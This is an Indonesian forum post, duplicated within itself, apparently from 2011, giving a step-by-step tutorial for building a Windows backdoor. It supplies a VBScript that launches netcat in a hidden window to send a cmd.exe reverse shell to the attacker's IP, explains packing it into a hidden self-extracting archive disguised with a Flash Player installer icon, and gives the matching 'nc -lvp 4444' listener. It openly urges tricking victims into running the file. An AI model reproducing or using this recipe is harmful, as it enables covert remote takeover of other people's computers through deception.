05-09-2011, 04:37 AM
weleh-weleh … kembali lagi dah ketemu ama gw yang memang gk habis-habisnya berbagi demi kemajuan IT dan opensource Indonesia. Pada kesempatan ini gw mau ngeshare mengenai tehnik simple bagaimana mendapat akses remote shell di windows dengan fasilitas netcat di backtrack. Ok baca resepnya terlebih dahulu. Simplenya tutorial ini akan mengajarkan kita untuk menyisipkan program backdoor pada salah satu installer windows, sehingga akan membuka koneksi remot pada saat program terkontaminasi di esekusi oleh korban
Remote windows with netcat
======================
Target : windows xp1,xp2,xp3,win7,vista
Attacker : Linux Backtrack R2
need :
- Netcat windows version ( download here )
- Reshacker windows version ( download here )
- FlashPlayer Installer ( dalam hal ini ane memilih flash player untuk sample.. bisa ente gunakan exe yang lain )
- winrar ( windows version )
- Netcat Linux version ( included on backtrack R2 )
- Script NC-Remote
copas aja bro .. ane males jelasin cara kerja script ini
Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)
Ok let we start ….
First Step
Ok pertama-tama edit script tadi pake notepad atau apa saja ganti kata-kata ip-ente dengan ip address pada komputer yang akan anda jadikan penyerang. simpan dengan nama zee.vbs
![[Image: script.jpg]](http://zeestuff.files.wordpress.com/2011/05/script.jpg)
Second Step
Siapkan Program NetCat yang sudah anda download terus bikin sfx archives di gabungkan dengan script yang sudah ente edit tadi ( zee.vbs )
![[Image: rar1.jpg]](http://zeestuff.files.wordpress.com/2011/05/rar1.jpg)
Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini gw samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan zee.vbs , agar setelah di extrak nanti zee.vbs akan langsung di esekusi pada path c:/
![[Image: rar2.jpg]](http://zeestuff.files.wordpress.com/2011/05/rar2.jpg)
Klik mode terus centang hide all
![[Image: rar3.jpg0]](http://zeestuff.files.wordpress.com/2011/05/rar3.jpg0)
Kemudian esekusi rar nya …..
Third Step
klik run terus ketik di situ iexpress lalu enter …lalu tinggal next-next aja sampe nanti di minta untuk memasukan file-file apa saja yang mau di gabungkan dalam satu install self extraction pada windows.Jangan lupa untuk mencentang hiden proses untuk menipu target . Simpan dengan extention exe
![[Image: ie21.jpg]](http://zeestuff.files.wordpress.com/2011/05/ie21.jpg)
Pembuatan self extraction selesai. Langkah terakhir kita ganti icon default dengan icon flash player installer dengan rest hacker.
![[Image: res.jpg]](http://zeestuff.files.wordpress.com/2011/05/res.jpg)
Ok file backdoor sudah ready. Terserah cara anda untuk memasukan file backdoor tadi ke komputer korban. Bisa lewat bujukan , download atau apa saja sesuai dengan kreasi ente
4th Step
Sekarang pada backtrack anda ketikan peritah di bawah ini untuk mengaktifkan nc
Kita tinggal menunggu agar korban mengeklik backdoor yang sudah ente siapkan tadi …kalo sudah di klik .. sudah dapat di pastikan nc pada terminal akan memulai session remote
![[Image: snapshot101.png?w=497&h=310]](http://zeestuff.files.wordpress.com/2011/05/snapshot101.png?w=497&h=310)
heheheh kita berhasil mendapatkan shell akses.. selanjutnya terserah ente ..
kalo kurang2 ngerti penjelasan ane.. silahkan download video tutorial yang udah ane bikin di bawah ini
http://www.ziddu.com/download/14911011/n...r.rar.html
thx to Jesus Christ , all my friend at IBTeam, IHT , tecon
see u in next trick D
Remote windows with netcat
======================
Target : windows xp1,xp2,xp3,win7,vista
Attacker : Linux Backtrack R2
need :
- Netcat windows version ( download here )
- Reshacker windows version ( download here )
- FlashPlayer Installer ( dalam hal ini ane memilih flash player untuk sample.. bisa ente gunakan exe yang lain )
- winrar ( windows version )
- Netcat Linux version ( included on backtrack R2 )
- Script NC-Remote
copas aja bro .. ane males jelasin cara kerja script ini
Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)
Ok let we start ….
First Step
Ok pertama-tama edit script tadi pake notepad atau apa saja ganti kata-kata ip-ente dengan ip address pada komputer yang akan anda jadikan penyerang. simpan dengan nama zee.vbs
Code:
Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)Second Step
Siapkan Program NetCat yang sudah anda download terus bikin sfx archives di gabungkan dengan script yang sudah ente edit tadi ( zee.vbs )
Pilih Advance SFX options tabs terus edit path to extract. Untuk kasus kali ini gw samplekan c:/ Hilangkan centang pada save & restore paths. Dan pada setup program ( run before extraction ) ketikan zee.vbs , agar setelah di extrak nanti zee.vbs akan langsung di esekusi pada path c:/
Klik mode terus centang hide all
Kemudian esekusi rar nya …..
Third Step
klik run terus ketik di situ iexpress lalu enter …lalu tinggal next-next aja sampe nanti di minta untuk memasukan file-file apa saja yang mau di gabungkan dalam satu install self extraction pada windows.Jangan lupa untuk mencentang hiden proses untuk menipu target
. Simpan dengan extention exePembuatan self extraction selesai. Langkah terakhir kita ganti icon default dengan icon flash player installer dengan rest hacker.
Ok file backdoor sudah ready. Terserah cara anda untuk memasukan file backdoor tadi ke komputer korban. Bisa lewat bujukan , download atau apa saja sesuai dengan kreasi ente
4th Step
Sekarang pada backtrack anda ketikan peritah di bawah ini untuk mengaktifkan nc
Code:
root@ibteam:~# nc -lvp 4444Kita tinggal menunggu agar korban mengeklik backdoor yang sudah ente siapkan tadi …kalo sudah di klik .. sudah dapat di pastikan nc pada terminal akan memulai session remote
heheheh kita berhasil mendapatkan shell akses.. selanjutnya terserah ente ..
kalo kurang2 ngerti penjelasan ane.. silahkan download video tutorial yang udah ane bikin di bawah ini
http://www.ziddu.com/download/14911011/n...r.rar.html
thx to Jesus Christ , all my friend at IBTeam, IHT , tecon
see u in next trick
D
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
for more question and sharing about security and Opensource only